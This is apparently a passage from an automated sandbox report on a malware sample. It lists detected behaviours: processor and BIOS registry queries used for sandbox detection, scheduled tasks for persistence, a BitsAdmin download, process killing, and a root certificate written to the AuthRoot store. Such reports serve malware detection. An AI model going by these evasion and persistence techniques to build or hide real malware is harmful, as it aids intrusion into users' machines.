\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeVC_redist.x86.exe4229854.scrWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsiexec.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision VC_redist.x86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4229854.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 4229854.scr Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier VC_redist.x86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 VC_redist.x86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3200 schtasks.exe 5808 schtasks.exe 5424 schtasks.exe 2484 schtasks.exe 3348 schtasks.exe 6980 schtasks.exe 1672 schtasks.exe 8072 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 7476 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
msedge.exeWerFault.exeWerFault.exeWerFault.exeWMIC.exeInstall.exeWerFault.exemsiexec.exesvchost.exe4229854.scrWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WMIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msiexec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 4229854.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3884 taskkill.exe 5148 taskkill.exe 6540 taskkill.exe 5788 taskkill.exe 8688 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
sihclient.exemsiexec.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe -
Modifies registry class 14 IoCs
Processes:
VC_redist.x86.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Version = "14.29.30040.0" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30040" VC_redist.x86.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\ = "{a8968509-65be-4c09-a460-fd1584b1cdbf}" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents\{a8968509-65be-4c09-a460-fd1584b1cdbf} VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
